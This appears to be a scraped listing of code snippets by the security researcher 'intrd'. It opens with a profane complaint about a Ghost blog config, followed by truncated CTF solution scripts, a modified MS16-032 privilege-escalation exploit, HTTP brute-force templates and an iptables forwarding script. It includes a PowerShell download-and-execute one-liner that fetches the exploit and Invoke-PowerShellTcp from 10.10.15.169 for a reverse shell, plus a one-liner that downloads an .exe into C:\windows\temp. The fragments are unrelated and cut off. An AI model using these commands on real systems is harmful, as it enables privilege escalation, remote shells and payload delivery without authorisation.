intrd

Google AMP is shit! we don't need this fucking our layouts..

Go to /core/server/config/index.js

        internalApps: ['private-blogging', 'subscribers', 'amp'],
        slugs: {
            // Used by generateSlug to generate slugs for posts, tags, users, ..
            // reserved slugs are reserved but can be extended/removed by apps
            // protected slugs cannot be changed or removed
            reserved: ['admin', 'app', 'apps', 'archive', 'archives', 'categories',

	# -- coding: utf-8 --
	#!/usr/bin/python
	## Encoding solution - prog300 @ hackaflag 2017 - joao pessoa
	# @author intrd - http://dann.com.br/ + pwn4food team

	# int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a

	import re, sys, string, math, time, os, random
	sys.path.append("../../LIBS")
	from int_netcat import Netcat

	## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv

	# Follow this cmd to exploit MS16-032 to get admin and run shell.ps1(ATTACHMNT): Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOURCOMANDHERE"
	# To get a reverse powershell, serve this ms16_032_intrd_mod.ps1 and Invoke-PowerShellTcp.ps1, and use this download & exec oneliner: IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003"

	function Invoke-MS16-032 {
	<#
	.SYNOPSIS

	PowerShell implementation of MS16-032. The exploit targets all vulnerable

	## Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0), maybe still working on future versions.
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	# Make a copy of this template and adapt to your task!

	import sys, time
	sys.path.append("libs/")
	from int_netcat import Netcat

	## Solution for SHX10 : web200-Read_My_eMail (recover the stream cipher key and create a valid session for every username)
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	import hashlib

	def xor_bytearray(d, k):
	return bytearray(a^b for a, b in zip(*map(bytearray, [d, k])))

	def generate_sessionid(given_username,anyusername):

	## Solution for SHX10 : misc100-thx (script to vertical slice 1px lines, shuffle and rejoin)
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	from __future__ import division
	import PIL, Image, random, math, os, time
	import numpy as np
	from shutil import copyfile

	def rejoin(slices,outfilename):

	# Powershell oneliner wget (anyver)
	# http://dann.com.br/

	@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe')

	## Nozzlr template : HTTP POST bruteforcer (Solution to shx8 : web200-freelyrics (Wordpress custom bruteforce))
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	import urllib, shutil, json, requests, pickle, os.path

	target="http://lab.shellterlabs.com:32914"

	def nozz_module(payload, self=False, founds=False):
	payloads=':'.join(str(v) for v in payload.values())

	#!/bin/sh
	# Forward a remote site:port to a localhost:port
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	iptables -F
	iptables -t nat -F
	iptables -X

	sysctl -w net.ipv4.conf.all.route_localnet=1